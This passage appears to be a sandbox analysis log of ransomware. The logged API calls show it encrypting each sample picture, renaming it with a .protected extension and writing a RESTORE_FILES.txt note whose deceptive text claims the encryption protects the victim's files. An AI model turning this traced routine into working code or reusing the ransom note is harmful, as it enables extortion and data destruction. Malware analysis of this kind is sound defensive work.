Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.protected")) returned 1 [0095.843] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.843] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="Windows") returned -1 [0095.843] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="Program Files") returned -1 [0095.844] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="Program Files (x86)") returned -1 [0095.844] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="$Recycle.bin") returned 1 [0095.844] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="System Volume Information") returned -1 [0095.844] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrIW (lpFirst="Hydrangeas.jpg", lpSrch=".protected") returned 0x0 [0095.844] lstrcmpW (lpString1="Hydrangeas.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.844] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.844] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".txt") returned 0x0 [0095.844] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".rar") returned 0x0 [0095.844] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".zip") returned 0x0 [0095.844] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.846] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.846] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.847] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.847] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.856] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.856] CloseHandle (hObject=0xd4) returned 1 [0095.857] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.protected") returned 69 [0095.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.protected")) returned 1 [0095.857] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.857] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="Windows") returned -1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="Program Files") returned -1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="Program Files (x86)") returned -1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="$Recycle.bin") returned 1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="System Volume Information") returned -1 [0095.858] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.858] StrStrIW (lpFirst="Jellyfish.jpg", lpSrch=".protected") returned 0x0 [0095.858] lstrcmpW (lpString1="Jellyfish.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.859] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.859] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".txt") returned 0x0 [0095.859] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.859] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".rar") returned 0x0 [0095.859] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.859] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".zip") returned 0x0 [0095.859] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.861] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.861] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.862] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.862] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.882] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.882] CloseHandle (hObject=0xd4) returned 1 [0095.883] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.protected") returned 68 [0095.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.protected")) returned 1 [0095.884] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="Windows") returned -1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="Program Files") returned -1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="Program Files (x86)") returned -1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="$Recycle.bin") returned 1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="System Volume Information") returned -1 [0095.884] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.884] StrStrIW (lpFirst="Koala.jpg", lpSrch=".protected") returned 0x0 [0095.884] lstrcmpW (lpString1="Koala.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.884] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.884] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.885] StrStrW (lpFirst="Koala.jpg", lpSrch=".txt") returned 0x0 [0095.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.885] StrStrW (lpFirst="Koala.jpg", lpSrch=".rar") returned 0x0 [0095.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.885] StrStrW (lpFirst="Koala.jpg", lpSrch=".zip") returned 0x0 [0095.885] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.906] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.906] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.907] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.907] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.910] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.910] CloseHandle (hObject=0xd4) returned 1 [0095.911] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.protected") returned 64 [0095.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.protected")) returned 1 [0095.912] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="Windows") returned -1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="Program Files") returned -1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="Program Files (x86)") returned -1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="$Recycle.bin") returned 1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="System Volume Information") returned -1 [0095.912] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.912] StrStrIW (lpFirst="Lighthouse.jpg", lpSrch=".protected") returned 0x0 [0095.912] lstrcmpW (lpString1="Lighthouse.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.912] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.912] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.913] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.913] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".txt") returned 0x0 [0095.914] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.914] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".rar") returned 0x0 [0095.914] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.914] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".zip") returned 0x0 [0095.914] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.931] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.931] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.932] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.932] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.934] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.934] CloseHandle (hObject=0xd4) returned 1 [0095.935] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.protected") returned 69 [0095.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.protected")) returned 1 [0095.936] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="Windows") returned -1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="Program Files") returned -1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="Program Files (x86)") returned -1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="$Recycle.bin") returned 1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="System Volume Information") returned -1 [0095.936] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.936] StrStrIW (lpFirst="Penguins.jpg", lpSrch=".protected") returned 0x0 [0095.936] lstrcmpW (lpString1="Penguins.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.936] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.936] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.937] StrStrW (lpFirst="Penguins.jpg", lpSrch=".txt") returned 0x0 [0095.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.937] StrStrW (lpFirst="Penguins.jpg", lpSrch=".rar") returned 0x0 [0095.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.937] StrStrW (lpFirst="Penguins.jpg", lpSrch=".zip") returned 0x0 [0095.937] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.956] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.956] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.958] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.958] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.977] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.977] CloseHandle (hObject=0xd4) returned 1 [0095.978] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.protected") returned 67 [0095.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.protected")) returned 1 [0095.979] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="Windows") returned -1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="Program Files") returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="Program Files (x86)") returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="$Recycle.bin") returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="System Volume Information") returned 1 [0095.979] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.979] StrStrIW (lpFirst="Tulips.jpg", lpSrch=".protected") returned 0x0 [0095.979] lstrcmpW (lpString1="Tulips.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0095.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.980] StrStrW (lpFirst="Tulips.jpg", lpSrch=".txt") returned 0x0 [0095.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.980] StrStrW (lpFirst="Tulips.jpg", lpSrch=".rar") returned 0x0 [0095.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.980] StrStrW (lpFirst="Tulips.jpg", lpSrch=".zip") returned 0x0 [0095.980] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.999] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.999] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.000] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.000] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.019] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.019] CloseHandle (hObject=0xd4) returned 1 [0096.019] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.protected") returned 65 [0096.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.protected")) returned 1 [0096.020] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0096.020] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0096.020] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES.txt") returned 62 [0096.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.021] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our 